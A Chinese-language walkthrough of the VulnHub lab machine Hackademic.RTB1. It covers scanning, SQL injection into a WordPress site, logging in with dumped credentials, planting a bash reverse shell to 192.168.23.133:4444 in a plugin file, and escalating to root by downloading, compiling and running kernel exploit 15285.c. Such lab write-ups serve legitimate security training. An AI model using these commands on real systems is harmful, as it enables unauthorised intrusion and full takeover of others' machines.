vulnhub系列:Hackademic.RTB1

vulnhub系列:Hackademic.RTB1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

复制代码
nmap 192.168.23.0/24

nmap 扫描端口,开放端口:22、80

复制代码
nmap 192.168.23.143 -p- -Pn -sV -O

访问80端口,页面发现 target 可以点击

点击后跳转,页面提示目标是读取到 key.txt 文件

wappalyzer 查看网站使用的 cms、语言等

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

dirb目录扫描

复制代码
dirb http://192.168.23.143/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wp-admin,发现后台登录页面

复制代码
http://192.168.23.143/Hackademic_RTB1/wp-admin

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

复制代码
cewl 192.168.23.143 -w pass.txt

爆破没有爆破出来

findsomething 中有一些参数,尝试sql注入,发现存在sql注入

复制代码
192.168.23.143/Hackademic_RTB1/?cat=1

dump 下数据,获取账号密码

可以看到有个10级用户,直接登录这个账号

复制代码
GeorgeMiller:q1w2e3

发现后台的 php 文件,且给出了文件路径

添加 phpinfo();,访问文件发现可以解析执行

二、getshell

写入一句话 getshell

复制代码
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");

kali 开启监听

复制代码
nc -lvnp 4444

访问文件,反弹成功

复制代码
http://192.168.23.143/Hackademic_RTB1/wp-content/plugins/hello.php

三、提权

使用 python 提升交互性

复制代码
python -c "import pty;pty.spawn('/bin/bash')"

查看当前权限,需要密码

复制代码
sudo -l

查看内核版本

复制代码
uname -a

搜一下相关版本的提权漏洞

复制代码
searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

复制代码
searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

复制代码
python3 -m http.server

wget http://192.168.23.133:8000/15285.c

进行编译后,执行文件,提权成功

复制代码
gcc 15285.c -o 15285
./15285

在 root 目录下发现 flag

相关推荐
Whoami!5 小时前
2-3〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸AppScan(WEB扫描)
网络安全·信息安全·appscan·oscp
2301_780789661 天前
边缘节点 DDoS 防护:CDN 节点的流量清洗与就近拦截方案
安全·web安全·ddos
Bruce_Liuxiaowei1 天前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss
观北海2 天前
网络安全蓝队常用工具全景与实战指南
安全·web安全
人衣aoa2 天前
PG靶机 - Pelican
web安全·网络安全·渗透测试·内网渗透
lingggggaaaa2 天前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中
笔记·学习·安全·web安全·网络安全·反序列化
运维行者_2 天前
使用Applications Manager进行 Apache Solr 监控
运维·网络·数据库·网络安全·云计算·apache·solr
峥嵘life2 天前
Android 欧盟网络安全EN18031 要求对应的基本表格填写
android·安全·web安全
挨踢攻城2 天前
IT资讯 | VMware ESXi高危漏洞影响国内服务器
安全·web安全·网络安全·vmware·虚拟化技术·厦门微思网络·vmware esxi高危漏洞
菜根Sec3 天前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场